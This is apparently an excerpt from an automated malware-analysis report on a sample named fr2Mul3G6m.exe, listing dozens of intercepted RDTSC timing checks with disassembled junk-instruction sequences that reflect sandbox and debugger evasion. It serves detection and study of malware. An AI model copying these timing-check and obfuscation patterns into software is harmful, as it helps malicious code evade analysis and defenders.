                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 468714 second address: 468719 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 468719 second address: 46872E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FBF0920B206h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jl 00007FBF0920B206h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4689ED second address: 468A02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBF093632EFh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 46E89B second address: 46E89F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 46E95F second address: 46E963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 46E9E9 second address: 46E9ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 46E9ED second address: 46E9F3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 46EABD second address: 46EAD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF0920B210h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4087D0 second address: 4087E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF093632F2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4087E8 second address: 4087EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4087EE second address: 40881B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF093632EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FBF093632F6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 40881B second address: 408837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jp 00007FBF0920B206h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 jc 00007FBF0920B206h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 472C39 second address: 472C5B instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBF093632E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007FBF093632EEh 0x00000012 pushad 0x00000013 popad 0x00000014 jc 00007FBF093632E6h 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f pop eax 0x00000020 push edi 0x00000021 pop edi 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 472D9F second address: 472DAB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jg 00007FBF0920B206h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 472DAB second address: 472DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 472DB1 second address: 472DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF0920B20Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 472F0D second address: 472F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jl 00007FBF093632E6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 472F1B second address: 472F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF0920B213h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 47320B second address: 473211 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 473346 second address: 473353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 473353 second address: 473360 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 47361A second address: 47361E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 47361E second address: 47362E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBF093632EAh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 47362E second address: 473632 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 473632 second address: 47366D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a jmp 00007FBF093632F0h 0x0000000f pop edx 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 jo 00007FBF093632E6h 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007FBF093632F1h 0x00000020 popad 0x00000021 push ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 47366D second address: 473673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 474EE4 second address: 474F08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FBF093632E6h 0x00000009 jc 00007FBF093632E6h 0x0000000f jno 00007FBF093632E6h 0x00000015 popad 0x00000016 push edx 0x00000017 jmp 00007FBF093632EBh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 479228 second address: 479238 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF0920B206h 0x00000008 jnl 00007FBF0920B206h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4798A4 second address: 4798C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF093632F8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4798C7 second address: 4798CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4798CC second address: 4798D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4798D1 second address: 4798DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FBF0920B206h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 479DF4 second address: 479DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 479DF8 second address: 479DFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 479DFC second address: 479E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jc 00007FBF093632E6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 479E0B second address: 479E10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 479E10 second address: 479E22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF093632ECh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 47A142 second address: 47A152 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FBF0920B20Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 43F532 second address: 43F536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 43F536 second address: 43F577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a movzx edx, dx 0x0000000d lea eax, dword ptr [ebp+1247B2D9h] 0x00000013 mov dl, 9Ch 0x00000015 mov edi, dword ptr [ebp+122D2EF0h] 0x0000001b nop 0x0000001c jc 00007FBF0920B21Eh 0x00000022 jmp 00007FBF0920B218h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 43F577 second address: 429BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007FBF093632E8h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 call dword ptr [ebp+122D1D15h] 0x00000027 push edx 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 43F98E second address: 43F993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 43F993 second address: 43F9A0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 43FB59 second address: 43FB5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 43FCE9 second address: 43FD1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF093632F9h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 je 00007FBF093632E6h 0x00000017 jnp 00007FBF093632E6h 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 43FD1B second address: 43FD3E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBF0920B20Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b mov cx, 2FBEh 0x0000000f nop 0x00000010 pushad 0x00000011 jnp 00007FBF0920B208h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 43FED9 second address: 43FEE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FBF093632E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 43FEE3 second address: 43FEF4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBF0920B206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 43FFC0 second address: 43FFC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 43FFC4 second address: 43FFCA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 440410 second address: 440447 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FBF093632E6h 0x00000009 jmp 00007FBF093632F0h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FBF093632F7h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 440447 second address: 440479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FBF0920B208h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 push 0000001Eh 0x00000024 mov edi, dword ptr [ebp+122D1D15h] 0x0000002a nop 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 440479 second address: 44047F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 44047F second address: 440484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 440484 second address: 440489 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 440489 second address: 44048F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 44048F second address: 4404A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FBF093632F0h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4405B0 second address: 4405B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 44074F second address: 440754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 440754 second address: 440789 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF0920B20Ch 0x00000008 jmp 00007FBF0920B216h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jnl 00007FBF0920B206h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 440789 second address: 4407C2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FBF093632ECh 0x0000000c jp 00007FBF093632E6h 0x00000012 popad 0x00000013 mov eax, dword ptr [eax] 0x00000015 jmp 00007FBF093632F3h 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e pushad 0x0000001f push edi 0x00000020 pushad 0x00000021 popad 0x00000022 pop edi 0x00000023 jc 00007FBF093632ECh 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 42A7ED second address: 42A813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FBF0920B20Ah 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FBF0920B213h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 47DC0C second address: 47DC12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 47DC12 second address: 47DC2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF0920B215h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 47DC2B second address: 47DC2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 47E060 second address: 47E064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 47E064 second address: 47E07E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF093632F0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 47E1EC second address: 47E20D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FBF0920B20Bh 0x0000000a pushad 0x0000000b popad 0x0000000c jc 00007FBF0920B206h 0x00000012 popad 0x00000013 je 00007FBF0920B212h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 47E20D second address: 47E213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 47E3AD second address: 47E3F1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBF0920B206h 0x00000008 jmp 00007FBF0920B218h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FBF0920B20Ah 0x00000014 popad 0x00000015 push esi 0x00000016 pushad 0x00000017 jmp 00007FBF0920B211h 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 47E3F1 second address: 47E3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 481CBA second address: 481CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF0920B20Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 481CCD second address: 481CD9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 481CD9 second address: 481CDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 481CDD second address: 481CFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF093632F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jno 00007FBF093632E6h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 481CFE second address: 481D06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 481D06 second address: 481D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 3FC94D second address: 3FC952 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 3FC952 second address: 3FC972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBF093632EFh 0x0000000e jne 00007FBF093632E8h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 3FC972 second address: 3FC97C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FBF0920B206h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4892CD second address: 4892EF instructions: 0x00000000 rdtsc 0x00000002 js 00007FBF093632E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FBF093632F8h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4892EF second address: 489311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBF0920B20Dh 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 489311 second address: 48931C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FBF093632E6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 4898FC second address: 489906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 489906 second address: 48991A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 jl 00007FBF093632F4h 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007FBF093632E6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 489A67 second address: 489A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FBF0920B217h 0x0000000b push ecx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fr2Mul3G6m.exeRDTSC instruction interceptor: First address: 489A88 second address: 489A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FBF093632E6h 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
